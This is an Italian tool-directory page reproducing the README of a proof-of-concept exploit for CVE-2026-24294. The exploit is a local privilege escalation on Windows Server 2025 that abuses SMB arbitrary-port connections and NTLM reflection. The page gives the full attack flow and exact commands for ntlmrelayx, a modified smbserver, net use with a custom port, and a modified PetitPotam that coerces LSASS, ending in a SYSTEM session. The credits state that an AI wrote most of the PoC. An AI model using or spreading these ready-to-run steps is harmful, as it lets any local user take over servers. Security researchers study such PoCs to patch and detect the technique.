Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24294 — # PoC di escalation dei privilegi locali per CVE-2026-24294 PoC di escalation dei privilegi locali per CVE-2026-24294, che sfrutta la porta arbitraria SMB e la riflessione NTLM per ottenere privilegi SYSTEM su Windows Server 2025. | Kitploit
Strumenti/GitHubGitHub/0xndi/cve-2026-24294
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePenetration TestingRed Teaming
GitHub0xndi/cve-2026-24294

CVE-2026-24294

# PoC di escalation dei privilegi locali per CVE-2026-24294 PoC di escalation dei privilegi locali per CVE-2026-24294, che sfrutta la porta arbitraria SMB e la riflessione NTLM per ottenere privilegi SYSTEM su Windows Server 2025.

Vedi Repository
5363 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24294 - Escalatazione Locale dei Privilegi tramite Riflessione NTLM via Porta Arbitraria SMB

Escalatazione locale dei privilegi su Windows Server 2025 tramite riflessione NTLM, sfruttando la funzionalità di porta arbitraria SMB introdotta in Windows 11 24H2 / Server 2025.

Vulnerabilità

Windows 11 24H2 / Server 2025 ha introdotto una funzionalità del client SMB che consente connessioni su porte TCP arbitrarie (net use \\host\share /tcpport:PORT). Combinata con il multiplexing delle sessioni SMB (MS-SMB2 Sezione 3.2.4.2), questa funzionalità abilita la riflessione NTLM locale — un utente con privilegi limitati può indurre un servizio privilegiato (LSASS) ad autenticarsi verso un server SMB controllato dall'attaccante su una porta non standard, per poi inoltrare l'autenticazione NTLM catturata al servizio SMB reale sulla porta 445.

Impatto: NT AUTHORITY\SYSTEM da qualsiasi utente locale.

Sistemi interessati: Windows Server 2025 (configurazione predefinita). Windows 11 24H2 applica la firma SMB, bloccando il relay.

Flusso dell'Attacco

root@kitploit:~
 LSASS (SYSTEM) ──NTLM──► Client SMB ──TCP:12345──► smbserver.py (nostro)
                                                   │
                                                   ▼ relay blob NTLM
 Servizio SMB (:445) ◄────────────────── ntlmrelayx.py
 ← sessione SYSTEM
  1. net use apre una connessione TCP verso il nostro server SMB su una porta personalizzata
  2. PetitPotam induce LSASS ad autenticarsi verso \\127.0.0.1\share
  3. Il client SMB riutilizza la connessione TCP esistente (multiplexing delle sessioni)
  4. Il nostro smbserver cattura il blob NTLM privilegiato e lo inoltra tramite ntlmrelayx
  5. ntlmrelayx si autentica al servizio SMB reale sulla porta 445 come SYSTEM

Requisiti

  • Target Windows Server 2025
  • Python 3 con Impacket
  • PetitPotam.exe (compilato dal sorgente con Visual Studio, vedi PetitPotam/)

Utilizzo

Aprire 3 terminali.

Terminale 1 — Avviare ntlmrelayx (in ascolto sulla porta RAW 6666, inoltra a SMB su localhost):

root@kitploit:~
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666

Terminale 2 — Avviare smbserver modificato (in ascolto sulla porta 12345, inoltra NTLM alla porta 6666):

root@kitploit:~
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666

Terminale 3 — Eseguire l'exploit:

root@kitploit:~
:: Monta la condivisione su porta personalizzata (apre connessione TCP persistente)
net use \\127.0.0.1\test /tcpport:12345 /user:user user

:: Induce LSASS ad autenticarsi al nostro server SMB
PetitPotam.exe 127.0.0.1 localhost 2

L'output di whoami da ntlmrelayx mostrerà NT AUTHORITY\SYSTEM.

Componenti

  • PetitPotam/ — Sorgente PetitPotam modificato. Due modifiche rispetto all'upstream:
    • UUID: df1941c5-fe89-4e79-bf10-463657acf44d (interfaccia EFSRPC WS2025)
    • Named pipe: \pipe\efsrpc
    • Usa l'API #2 (EfsRpcEncryptFileSrv), nome condivisione hardcoded come test
  • smbserver.py — smbserver impacket modificato con il flag -relay-port. Aggancia SMB2 SESSION_SETUP per catturare una seconda autenticazione NTLM su una connessione multiplexata e inoltrarla a un server relay RAW (ntlmrelayx --raw-port).

Crediti

Questo PoC è stato scritto principalmente da un'IA (GLM 5.1) basandosi sulla ricerca e sulle tecniche descritte in:

  • Bypassing Windows Authentication Reflection Mitigations for System Shells — Guillaume André, Synacktiv

Riferimenti

  • CVE-2026-24294 — Microsoft Security Response Center
  • PetitPotam — Gilles Lionel
  • Impacket — Fortra
Scarica lo strumento